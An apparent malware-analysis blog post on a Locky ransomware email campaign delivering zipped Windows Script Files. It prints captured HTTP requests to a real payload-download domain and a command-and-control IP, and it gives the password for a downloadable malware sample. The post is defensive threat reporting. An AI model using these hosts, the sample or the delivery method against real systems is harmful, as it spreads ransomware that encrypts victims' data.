Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript. The only difference is the tag at the beginning of the file.

Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0;
 .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; 
.NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive  

[post data omitted]

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken" ).

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn